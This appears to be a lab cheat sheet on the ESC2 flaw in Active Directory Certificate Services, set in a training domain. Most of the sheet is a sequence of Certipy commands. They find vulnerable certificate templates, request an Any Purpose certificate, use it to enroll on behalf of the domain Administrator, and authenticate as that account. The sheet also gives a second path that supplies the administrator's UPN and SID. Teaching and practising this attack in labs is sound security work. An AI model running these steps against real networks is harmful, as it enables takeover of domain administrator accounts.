ESC2 abuses templates with Any Purpose EKU or no EKU. The resulting certificate is overly flexible and can often be used as an enrollment agent or as a stepping stone into ESC3-style abuse.
Conditions
Template is enabled on a CA.
Requester has enrollment rights.
Template has Any Purpose EKU or no EKU.
Manager approval is not required.
Authorized signatures required is 0.
Find ESC2
certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -vulnerable -enabled -stdout
Request Any Purpose certificate
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC2 -out esc2_agent
Use it as an enrollment agent
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template User -on-behalf-of 'OOTW\Administrator' -pfx esc2_agent.pfx -out administrator
Authenticate as target
certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
klist
If subject supply is also enabled
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC2 -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -out administrator
certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
Notes
ESC2 is usually a chain. The Any Purpose certificate is not always the final credential by itself. We use it to satisfy another certificate workflow, most commonly enrollment-agent style requests.